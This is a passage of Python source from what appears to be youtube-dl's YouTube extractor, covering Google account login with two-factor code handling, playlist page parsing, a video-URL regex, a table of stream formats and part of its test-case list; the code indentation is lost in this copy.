_CHALLENGE_URL = 'https://accounts.google.com/_/signin/sl/challenge'
_TFA_URL = 'https://accounts.google.com/_/signin/challenge?hl=en&TL={0}'
_NETRC_MACHINE = 'youtube'
# If True it will raise an error if no login info is provided
_LOGIN_REQUIRED = False
_PLAYLIST_ID_RE = r'(?:PL|LL|EC|UU|FL|RD|UL|TL|OLAK5uy_)[0-9A-Za-z-_]{10,}'
def _set_language(self):
self._set_cookie(
'.youtube.com', 'PREF', 'f1=50000000&hl=en',
# YouTube sets the expire time to about two months
expire_time=time.time() + 2 * 30 * 24 * 3600)
def _ids_to_results(self, ids):
return [
self.url_result(vid_id, 'Youtube', video_id=vid_id)
for vid_id in ids]
def _login(self):
"""
Attempt to log in to YouTube.
True is returned if successful or skipped.
False is returned if login failed.
If _LOGIN_REQUIRED is set and no authentication was provided, an error is raised.
"""
username, password = self._get_login_info()
# No authentication to be performed
if username is None:
if self._LOGIN_REQUIRED and self._downloader.params.get('cookiefile') is None:
raise ExtractorError('No login info available, needed for using %s.' % self.IE_NAME, expected=True)
return True
login_page = self._download_webpage(
self._LOGIN_URL, None,
note='Downloading login page',
errnote='unable to fetch login page', fatal=False)
if login_page is False:
return
login_form = self._hidden_inputs(login_page)
def req(url, f_req, note, errnote):
data = login_form.copy()
data.update({
'pstMsg': 1,
'checkConnection': 'youtube',
'checkedDomains': 'youtube',
'hl': 'en',
'deviceinfo': '[null,null,null,[],null,"US",null,null,[],"GlifWebSignIn",null,[null,null,[]]]',
'f.req': json.dumps(f_req),
'flowName': 'GlifWebSignIn',
'flowEntry': 'ServiceLogin',
})
return self._download_json(
url, None, note=note, errnote=errnote,
transform_source=lambda s: re.sub(r'^[^[]*', '', s),
fatal=False,
data=urlencode_postdata(data), headers={
'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8',
'Google-Accounts-XSRF': 1,
})
def warn(message):
self._downloader.report_warning(message)
lookup_req = [
username,
None, [], None, 'US', None, None, 2, False, True,
[
None, None,
[2, 1, None, 1,
'https://accounts.google.com/ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fnext%3D%252F%26action_handle_signin%3Dtrue%26hl%3Den%26app%3Ddesktop%26feature%3Dsign_in_button&hl=en&service=youtube&uilel=3&requestPath=%2FServiceLogin&Page=PasswordSeparationSignIn',
None, [], 4],
1, [None, None, []], None, None, None, True
],
username,
]
lookup_results = req(
self._LOOKUP_URL, lookup_req,
'Looking up account info', 'Unable to look up account info')
if lookup_results is False:
return False
user_hash = try_get(lookup_results, lambda x: x[0][2], compat_str)
if not user_hash:
warn('Unable to extract user hash')
return False
challenge_req = [
user_hash,
None, 1, None, [1, None, None, None, [password, None, True]],
[
None, None, [2, 1, None, 1, 'https://accounts.google.com/ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fnext%3D%252F%26action_handle_signin%3Dtrue%26hl%3Den%26app%3Ddesktop%26feature%3Dsign_in_button&hl=en&service=youtube&uilel=3&requestPath=%2FServiceLogin&Page=PasswordSeparationSignIn', None, [], 4],
1, [None, None, []], None, None, None, True
]]
challenge_results = req(
self._CHALLENGE_URL, challenge_req,
'Logging in', 'Unable to log in')
if challenge_results is False:
return
login_res = try_get(challenge_results, lambda x: x[0][5], list)
if login_res:
login_msg = try_get(login_res, lambda x: x[5], compat_str)
warn(
'Unable to login: %s' % 'Invalid password'
if login_msg == 'INCORRECT_ANSWER_ENTERED' else login_msg)
return False
res = try_get(challenge_results, lambda x: x[0][-1], list)
if not res:
warn('Unable to extract result entry')
return False
login_challenge = try_get(res, lambda x: x[0][0], list)
if login_challenge:
challenge_str = try_get(login_challenge, lambda x: x[2], compat_str)
if challenge_str == 'TWO_STEP_VERIFICATION':
# SEND_SUCCESS - TFA code has been successfully sent to phone
# QUOTA_EXCEEDED - reached the limit of TFA codes
status = try_get(login_challenge, lambda x: x[5], compat_str)
if status == 'QUOTA_EXCEEDED':
warn('Exceeded the limit of TFA codes, try later')
return False
tl = try_get(challenge_results, lambda x: x[1][2], compat_str)
if not tl:
warn('Unable to extract TL')
return False
tfa_code = self._get_tfa_info('2-step verification code')
if not tfa_code:
warn(
'Two-factor authentication required. Provide it either interactively or with --twofactor <code>'
'(Note that only TOTP (Google Authenticator App) codes work at this time.)')
return False
tfa_code = remove_start(tfa_code, 'G-')
tfa_req = [
user_hash, None, 2, None,
[
9, None, None, None, None, None, None, None,
[None, tfa_code, True, 2]
]]
tfa_results = req(
self._TFA_URL.format(tl), tfa_req,
'Submitting TFA code', 'Unable to submit TFA code')
if tfa_results is False:
return False
tfa_res = try_get(tfa_results, lambda x: x[0][5], list)
if tfa_res:
tfa_msg = try_get(tfa_res, lambda x: x[5], compat_str)
warn(
'Unable to finish TFA: %s' % 'Invalid TFA code'
if tfa_msg == 'INCORRECT_ANSWER_ENTERED' else tfa_msg)
return False
check_cookie_url = try_get(
tfa_results, lambda x: x[0][-1][2], compat_str)
else:
CHALLENGES = {
'LOGIN_CHALLENGE': "This device isn't recognized. For your security, Google wants to make sure it's really you.",
'USERNAME_RECOVERY': 'Please provide additional information to aid in the recovery process.',
'REAUTH': "There is something unusual about your activity. For your security, Google wants to make sure it's really you.",
}
challenge = CHALLENGES.get(
challenge_str,
'%s returned error %s.' % (self.IE_NAME, challenge_str))
warn('%s\nGo to https://accounts.google.com/, login and solve a challenge.' % challenge)
return False
else:
check_cookie_url = try_get(res, lambda x: x[2], compat_str)
if not check_cookie_url:
warn('Unable to extract CheckCookie URL')
return False
check_cookie_results = self._download_webpage(
check_cookie_url, None, 'Checking cookie', fatal=False)
if check_cookie_results is False:
return False
if 'https://myaccount.google.com/' not in check_cookie_results:
warn('Unable to log in')
return False
return True
def _download_webpage_handle(self, *args, **kwargs):
kwargs.setdefault('query', {})['disable_polymer'] = 'true'
return super(YoutubeBaseInfoExtractor, self)._download_webpage_handle(
*args, **compat_kwargs(kwargs))
def _real_initialize(self):
if self._downloader is None:
return
self._set_language()
if not self._login():
return
class YoutubeEntryListBaseInfoExtractor(YoutubeBaseInfoExtractor):
# Extract entries from page with "Load more" button
def _entries(self, page, playlist_id):
more_widget_html = content_html = page
for page_num in itertools.count(1):
for entry in self._process_page(content_html):
yield entry
mobj = re.search(r'data-uix-load-more-href="/?(?P<more>[^"]+)"', more_widget_html)
if not mobj:
break
more = self._download_json(
'https://youtube.com/%s' % mobj.group('more'), playlist_id,
'Downloading page #%s' % page_num,
transform_source=uppercase_escape)
content_html = more['content_html']
if not content_html.strip():
# Some webpages show a "Load more" button but they don't
# have more videos
break
more_widget_html = more['load_more_widget_html']
class YoutubePlaylistBaseInfoExtractor(YoutubeEntryListBaseInfoExtractor):
def _process_page(self, content):
for video_id, video_title in self.extract_videos_from_page(content):
yield self.url_result(video_id, 'Youtube', video_id, video_title)
def extract_videos_from_page(self, page):
ids_in_page = []
titles_in_page = []
for mobj in re.finditer(self._VIDEO_RE, page):
            # The link with index 0 is not the first video of the playlist (not sure if this is still the case)
if 'index' in mobj.groupdict() and mobj.group('id') == '0':
continue
video_id = mobj.group('id')
video_title = unescapeHTML(mobj.group('title'))
if video_title:
video_title = video_title.strip()
try:
idx = ids_in_page.index(video_id)
if video_title and not titles_in_page[idx]:
titles_in_page[idx] = video_title
except ValueError:
ids_in_page.append(video_id)
titles_in_page.append(video_title)
return zip(ids_in_page, titles_in_page)
class YoutubePlaylistsBaseInfoExtractor(YoutubeEntryListBaseInfoExtractor):
def _process_page(self, content):
for playlist_id in orderedSet(re.findall(
r'<h3[^>]+class="[^"]*yt-lockup-title[^"]*"[^>]*><a[^>]+href="/?playlist\?list=([0-9A-Za-z-_]{10,})"',
content)):
yield self.url_result(
'https://www.youtube.com/playlist?list=%s' % playlist_id, 'YoutubePlaylist')
def _real_extract(self, url):
playlist_id = self._match_id(url)
webpage = self._download_webpage(url, playlist_id)
title = self._og_search_title(webpage, fatal=False)
return self.playlist_result(self._entries(webpage, playlist_id), playlist_id, title)
class YoutubeIE(YoutubeBaseInfoExtractor):
IE_DESC = 'YouTube.com'
_VALID_URL = r"""(?x)^
(
(?:https?://|//) # http(s):// or protocol-independent URL
(?:(?:(?:(?:\w+\.)?[yY][oO][uU][tT][uU][bB][eE](?:-nocookie)?\.com/|
(?:www\.)?deturl\.com/www\.youtube\.com/|
(?:www\.)?pwnyoutube\.com/|
(?:www\.)?hooktube\.com/|
(?:www\.)?yourepeat\.com/|
tube\.majestyc\.net/|
youtube\.googleapis\.com/) # the various hostnames, with wildcard subdomains
(?:.*?\#/)? # handle anchor (#/) redirect urls
(?: # the various things that can precede the ID:
(?:(?:v|embed|e)/(?!videoseries)) # v/ or embed/ or e/
|(?: # or the v= param in all its forms
(?:(?:watch|movie)(?:_popup)?(?:\.php)?/?)? # preceding watch(_popup|.php) or nothing (like /?v=xxxx)
(?:\?|\#!?) # the params delimiter ? or # or #!
(?:.*?[&;])?? # any other preceding param (like /?s=tuff&v=xxxx or ?s=tuff&v=V36LpHqtcDY)
v=
)
))
|(?:
youtu\.be| # just youtu.be/xxxx
vid\.plus| # or vid.plus/xxxx
zwearz\.com/watch| # or zwearz.com/watch/xxxx
)/
|(?:www\.)?cleanvideosearch\.com/media/action/yt/watch\?videoId=
)
)? # all until now is optional -> you can pass the naked ID
([0-9A-Za-z_-]{11}) # here is it! the YouTube video ID
(?!.*?\blist=
(?:
%(playlist_id)s| # combined list/video URLs are handled by the playlist IE
WL # WL are handled by the watch later IE
)
)
(?(1).+)? # if we found the ID, everything can follow
$""" % {'playlist_id': YoutubeBaseInfoExtractor._PLAYLIST_ID_RE}
_NEXT_URL_RE = r'[\?&]next_url=([^&]+)'
_formats = {
'5': {'ext': 'flv', 'width': 400, 'height': 240, 'acodec': 'mp3', 'abr': 64, 'vcodec': 'h263'},
'6': {'ext': 'flv', 'width': 450, 'height': 270, 'acodec': 'mp3', 'abr': 64, 'vcodec': 'h263'},
'13': {'ext': '3gp', 'acodec': 'aac', 'vcodec': 'mp4v'},
'17': {'ext': '3gp', 'width': 176, 'height': 144, 'acodec': 'aac', 'abr': 24, 'vcodec': 'mp4v'},
'18': {'ext': 'mp4', 'width': 640, 'height': 360, 'acodec': 'aac', 'abr': 96, 'vcodec': 'h264'},
'22': {'ext': 'mp4', 'width': 1280, 'height': 720, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'34': {'ext': 'flv', 'width': 640, 'height': 360, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
'35': {'ext': 'flv', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
# itag 36 videos are either 320x180 (BaW_jenozKc) or 320x240 (__2ABJjxzNo), abr varies as well
'36': {'ext': '3gp', 'width': 320, 'acodec': 'aac', 'vcodec': 'mp4v'},
'37': {'ext': 'mp4', 'width': 1920, 'height': 1080, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'38': {'ext': 'mp4', 'width': 4096, 'height': 3072, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'43': {'ext': 'webm', 'width': 640, 'height': 360, 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8'},
'44': {'ext': 'webm', 'width': 854, 'height': 480, 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8'},
'45': {'ext': 'webm', 'width': 1280, 'height': 720, 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8'},
'46': {'ext': 'webm', 'width': 1920, 'height': 1080, 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8'},
'59': {'ext': 'mp4', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
'78': {'ext': 'mp4', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
# 3D videos
'82': {'ext': 'mp4', 'height': 360, 'format_note': '3D', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -20},
'83': {'ext': 'mp4', 'height': 480, 'format_note': '3D', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -20},
'84': {'ext': 'mp4', 'height': 720, 'format_note': '3D', 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264', 'preference': -20},
'85': {'ext': 'mp4', 'height': 1080, 'format_note': '3D', 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264', 'preference': -20},
'100': {'ext': 'webm', 'height': 360, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8', 'preference': -20},
'101': {'ext': 'webm', 'height': 480, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8', 'preference': -20},
'102': {'ext': 'webm', 'height': 720, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8', 'preference': -20},
# Apple HTTP Live Streaming
'91': {'ext': 'mp4', 'height': 144, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'92': {'ext': 'mp4', 'height': 240, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'93': {'ext': 'mp4', 'height': 360, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -10},
'94': {'ext': 'mp4', 'height': 480, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -10},
'95': {'ext': 'mp4', 'height': 720, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 256, 'vcodec': 'h264', 'preference': -10},
'96': {'ext': 'mp4', 'height': 1080, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 256, 'vcodec': 'h264', 'preference': -10},
'132': {'ext': 'mp4', 'height': 240, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'151': {'ext': 'mp4', 'height': 72, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 24, 'vcodec': 'h264', 'preference': -10},
# DASH mp4 video
'133': {'ext': 'mp4', 'height': 240, 'format_note': 'DASH video', 'vcodec': 'h264'},
'134': {'ext': 'mp4', 'height': 360, 'format_note': 'DASH video', 'vcodec': 'h264'},
'135': {'ext': 'mp4', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'h264'},
'136': {'ext': 'mp4', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'h264'},
'137': {'ext': 'mp4', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'h264'},
'138': {'ext': 'mp4', 'format_note': 'DASH video', 'vcodec': 'h264'}, # Height can vary (https://github.com/rg3/youtube-dl/issues/4559)
'160': {'ext': 'mp4', 'height': 144, 'format_note': 'DASH video', 'vcodec': 'h264'},
'212': {'ext': 'mp4', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'h264'},
'264': {'ext': 'mp4', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'h264'},
'298': {'ext': 'mp4', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'h264', 'fps': 60},
'299': {'ext': 'mp4', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'h264', 'fps': 60},
'266': {'ext': 'mp4', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'h264'},
# Dash mp4 audio
'139': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 48, 'container': 'm4a_dash'},
'140': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 128, 'container': 'm4a_dash'},
'141': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 256, 'container': 'm4a_dash'},
'256': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'container': 'm4a_dash'},
'258': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'container': 'm4a_dash'},
'325': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'dtse', 'container': 'm4a_dash'},
'328': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'ec-3', 'container': 'm4a_dash'},
# Dash webm
'167': {'ext': 'webm', 'height': 360, 'width': 640, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'168': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'169': {'ext': 'webm', 'height': 720, 'width': 1280, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'170': {'ext': 'webm', 'height': 1080, 'width': 1920, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'218': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'219': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'278': {'ext': 'webm', 'height': 144, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp9'},
'242': {'ext': 'webm', 'height': 240, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'243': {'ext': 'webm', 'height': 360, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'244': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'245': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'246': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'247': {'ext': 'webm', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'248': {'ext': 'webm', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'271': {'ext': 'webm', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'vp9'},
# itag 272 videos are either 3840x2160 (e.g. RtoitU2A-3E) or 7680x4320 (sLprVF6d7Ug)
'272': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'302': {'ext': 'webm', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'303': {'ext': 'webm', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'308': {'ext': 'webm', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'313': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'315': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
# Dash webm audio
'171': {'ext': 'webm', 'acodec': 'vorbis', 'format_note': 'DASH audio', 'abr': 128},
'172': {'ext': 'webm', 'acodec': 'vorbis', 'format_note': 'DASH audio', 'abr': 256},
# Dash webm audio with opus inside
'249': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 50},
'250': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 70},
'251': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 160},
# RTMP (unnamed)
'_rtmp': {'protocol': 'rtmp'},
}
_SUBTITLE_FORMATS = ('ttml', 'vtt')
_GEO_BYPASS = False
IE_NAME = 'youtube'
_TESTS = [
{
'url': 'https://www.youtube.com/watch?v=BaW_jenozKc&t=1s&end=9',
'info_dict': {
'id': 'BaW_jenozKc',
'ext': 'mp4',
'title': 'youtube-dl test video "\'/\\ä↭𝕐',
'uploader': 'Philipp Hagemeister',
'uploader_id': 'phihag',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/phihag',
'upload_date': '20121002',
'license': 'Standard YouTube License',
'description': 'test chars: "\'/\\ä↭𝕐\ntest URL: https://github.com/rg3/youtube-dl/issues/1892\n\nThis is a test video for youtube-dl.\n\nFor more information, contact [email protected] .',
'categories': ['Science & Technology'],
'tags': ['youtube-dl'],
'duration': 10,
'like_count': int,
'dislike_count': int,
'start_time': 1,
'end_time': 9,
}
},
{
'url': 'https://www.youtube.com/watch?v=UxxajLWwzqY',
'note': 'Test generic use_cipher_signature video (#897)',
'info_dict': {
'id': 'UxxajLWwzqY',
'ext': 'mp4',
'upload_date': '20120506',
'title': 'Icona Pop - I Love It (feat. Charli XCX) [OFFICIAL VIDEO]',
'alt_title': 'I Love It (feat. Charli XCX)',
'description': 'md5:f3ceb5ef83a08d95b9d146f973157cc8',
'tags': ['Icona Pop i love it', 'sweden', 'pop music', 'big beat records', 'big beat', 'charli',
'xcx', 'charli xcx', 'girls', 'hbo', 'i love it', "i don't care", 'icona', 'pop',
'iconic ep', 'iconic', 'love', 'it'],
'duration': 180,
'uploader': 'Icona Pop',
'uploader_id': 'IconaPop',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/IconaPop',
'license': 'Standard YouTube License',
'creator': 'Icona Pop',
'track': 'I Love It (feat. Charli XCX)',
'artist': 'Icona Pop',
}
},
{
'url': 'https://www.youtube.com/watch?v=07FYdnEawAQ',
'note': 'Test VEVO video with age protection (#956)',
'info_dict': {
'id': '07FYdnEawAQ',
'ext': 'mp4',
'upload_date': '20130703',
'title': 'Justin Timberlake - Tunnel Vision (Explicit)',
'alt_title': 'Tunnel Vision',
'description': 'md5:64249768eec3bc4276236606ea996373',
'duration': 419,
'uploader': 'justintimberlakeVEVO',
'uploader_id': 'justintimberlakeVEVO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/justintimberlakeVEVO',
'license': 'Standard YouTube License',
'creator': 'Justin Timberlake',
'track': 'Tunnel Vision',
'artist': 'Justin Timberlake',
'age_limit': 18,
}
},
{
'url': '//www.YouTube.com/watch?v=yZIXLfi8CZQ',
'note': 'Embed-only video (#1746)',
'info_dict': {
'id': 'yZIXLfi8CZQ',
'ext': 'mp4',
'upload_date': '20120608',
'title': 'Principal Sexually Assaults A Teacher - Episode 117 - 8th June 2012',
'description': 'md5:09b78bd971f1e3e289601dfba15ca4f7',
'uploader': 'SET India',
'uploader_id': 'setindia',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/setindia',
'license': 'Standard YouTube License',
'age_limit': 18,
}
},
{
'url': 'https://www.youtube.com/watch?v=BaW_jenozKc&v=UxxajLWwzqY',
'note': 'Use the first video ID in the URL',
'info_dict': {
'id': 'BaW_jenozKc',
'ext': 'mp4',
'title': 'youtube-dl test video "\'/\\ä↭𝕐',
'uploader': 'Philipp Hagemeister',
'uploader_id': 'phihag',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/phihag',
'upload_date': '20121002',
'license': 'Standard YouTube License',
'description': 'test chars: "\'/\\ä↭𝕐\ntest URL: https://github.com/rg3/youtube-dl/issues/1892\n\nThis is a test video for youtube-dl.\n\nFor more information, contact [email protected] .',
'categories': ['Science & Technology'],
'tags': ['youtube-dl'],
'duration': 10,
'like_count': int,
'dislike_count': int,
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.youtube.com/watch?v=a9LDPn-MO4I',
'note': '256k DASH audio (format 141) via DASH manifest',
'info_dict': {
'id': 'a9LDPn-MO4I',
'ext': 'm4a',
'upload_date': '20121002',
'uploader_id': '8KVIDEO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/8KVIDEO',
'description': '',
'uploader': '8KVIDEO',
'license': 'Standard YouTube License',
'title': 'UHDTV TEST 8K VIDEO.mp4'
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141',
},
'skip': 'format 141 not served anymore',
},
# DASH manifest with encrypted signature
{
'url': 'https://www.youtube.com/watch?v=IB3lcPjvWLA',
'info_dict': {
'id': 'IB3lcPjvWLA',
'ext': 'm4a',
'title': 'Afrojack, Spree Wilson - The Spark ft. Spree Wilson',
'description': 'md5:1900ed86ee514927b9e00fbead6969a5',
'duration': 244,
'uploader': 'AfrojackVEVO',
'uploader_id': 'AfrojackVEVO',
'upload_date': '20131011',
'license': 'Standard YouTube License',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141/bestaudio[ext=m4a]',
},
},
# JS player signature function name containing $
{
'url': 'https://www.youtube.com/watch?v=nfWlot6h_JM',
'info_dict': {
'id': 'nfWlot6h_JM',
'ext': 'm4a',
'title': 'Taylor Swift - Shake It Off',
'alt_title': 'Shake It Off',
'description': 'md5:95f66187cd7c8b2c13eb78e1223b63c3',
'duration': 242,
'uploader': 'TaylorSwiftVEVO',
'uploader_id': 'TaylorSwiftVEVO',
'upload_date': '20140818',
'license': 'Standard YouTube License',
'creator': 'Taylor Swift',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141/bestaudio[ext=m4a]',
},
},
# Controversy video
{
'url': 'https://www.youtube.com/watch?v=T4XJQO3qol8',
'info_dict': {
'id': 'T4XJQO3qol8',
'ext': 'mp4',
'duration': 219,
'upload_date': '20100909',
'uploader': 'TJ Kirk',
'uploader_id': 'TheAmazingAtheist',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/TheAmazingAtheist',
'license': 'Standard YouTube License',
'title': 'Burning Everyone\'s Koran',
'description': 'SUBSCRIBE: http://www.youtube.com/saturninefilms\n\nEven Obama has taken a stand against freedom on this issue: http://www.huffingtonpost.com/2010/09/09/obama-gma-interview-quran_n_710282.html',
}
},
# Normal age-gate video (No vevo, embed allowed)
{
'url': 'https://youtube.com/watch?v=HtVdAasjOgU',
'info_dict': {
'id': 'HtVdAasjOgU',
'ext': 'mp4',
'title': 'The Witcher 3: Wild Hunt - The Sword Of Destiny Trailer',
'description': r're:(?s).{100,}About the Game\n.*?The Witcher 3: Wild Hunt.{100,}',
'duration': 142,
'uploader': 'The Witcher',
'uploader_id': 'WitcherGame',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/WitcherGame',
'upload_date': '20140605',
'license': 'Standard YouTube License',
'age_limit': 18,
},
},
# Age-gate video with encrypted signature
{
'url': 'https://www.youtube.com/watch?v=6kLq3WMV1nU',
'info_dict': {
'id': '6kLq3WMV1nU',
'ext': 'webm',
'title': 'Dedication To My Ex (Miss That) (Lyric Video)',
'description': 'md5:33765bb339e1b47e7e72b5490139bb41',
'duration': 246,
'uploader': 'LloydVEVO',
'uploader_id': 'LloydVEVO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/LloydVEVO',
'upload_date': '20110629',
'license': 'Standard YouTube License',
'age_limit': 18,
},
},
# video_info is None (https://github.com/rg3/youtube-dl/issues/4421)
# YouTube Red ad is not captured for creator
{
'url': '__2ABJjxzNo',
'info_dict': {
'id': '__2ABJjxzNo',
'ext': 'mp4',
'duration': 266,
'upload_date': '20100430',
'uploader_id': 'deadmau5',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/deadmau5',
'creator': 'deadmau5',
'description': 'md5:12c56784b8032162bb936a5f76d55360',
'uploader': 'deadmau5',
'license': 'Standard YouTube License',
'title': 'Deadmau5 - Some Chords (HD)',
'alt_title': 'Some Chords',
},
'expected_warnings': [
'DASH manifest missing',
]
},
# Olympics (https://github.com/rg3/youtube-dl/issues/4431)
{
'url': 'lqQg6PlCWgI',
'info_dict': {
'id': 'lqQg6PlCWgI',
'ext': 'mp4',
'duration': 6085,
'upload_date': '20150827',
'uploader_id': 'olympic',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/olympic',
'license': 'Standard YouTube License',
'description': 'HO09 - Women - GER-AUS - Hockey - 31 July 2012 - London 2012 Olympic Games',
'uploader': 'Olympic',
'title': 'Hockey - Women - GER-AUS - London 2012 Olympic Games',
},
'params': {
'skip_download': 'requires avconv',
}
},
# Non-square pixels
{
'url': 'https://www.youtube.com/watch?v=_b-2C3KPAM0',
'info_dict': {
'id': '_b-2C3KPAM0',
'ext': 'mp4',
'stretched_ratio': 16 / 9.,
'duration': 85,
'upload_date': '20110310',
'uploader_id': 'AllenMeow',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/AllenMeow',
'description': 'made by Wacom from Korea | 字幕&加油添醋 by TY\'s Allen | 感謝heylisa00cavey1001同學熱情提供梗及翻譯',
'uploader': '孫ᄋᄅ',
'license': 'Standard YouTube License',
'title': '[A-made] 變態妍字幕版 太妍 我就是這樣的人',
},
},
# url_encoded_fmt_stream_map is empty string
{
'url': 'qEJwOuvDf7I',
'info_dict': {
'id': 'qEJwOuvDf7I',
'ext': 'webm',
'title': 'Обсуждение судебной практики по выборам 14 сентября 2014 года в Санкт-Петербурге',
'description': '',
'upload_date': '20150404',
'uploader_id': 'spbelect',
'uploader': 'Наблюдатели Петербурга',
},
'params': {
'skip_download': 'requires avconv',
},
'skip': 'This live event has ended.',
},
# Extraction from multiple DASH manifests (https://github.com/rg3/youtube-dl/pull/6097)
{
'url': 'https://www.youtube.com/watch?v=FIl7x6_3R5Y',
'info_dict': {
'id': 'FIl7x6_3R5Y',
'ext': 'webm',
'title': 'md5:7b81415841e02ecd4313668cde88737a',
'description': 'md5:116377fd2963b81ec4ce64b542173306',
'duration': 220,
'upload_date': '20150625',
'uploader_id': 'dorappi2000',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/dorappi2000',
'uploader': 'dorappi2000',
'license': 'Standard YouTube License',
'formats': 'mincount:31',
},
'skip': 'not actual anymore',
},
# DASH manifest with segment_list
{
'url': 'https://www.youtube.com/embed/CsmdDsKjzN8',
'md5': '8ce563a1d667b599d21064e982ab9e31',
'info_dict': {
'id': 'CsmdDsKjzN8',
'ext': 'mp4',
'upload_date': '20150501', # According to '<meta itemprop="datePublished"', but in other places it's 20150510
'uploader': 'Airtek',
'description': 'Retransmisión en directo de la XVIII media maratón de Zaragoza.',
'uploader_id': 'UCzTzUmjXxxacNnL8I3m4LnQ',
'license': 'Standard YouTube License',
'title': 'Retransmisión XVIII Media maratón Zaragoza 2015',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '135', # bestvideo
},
'skip': 'This live event has ended.',
},
{
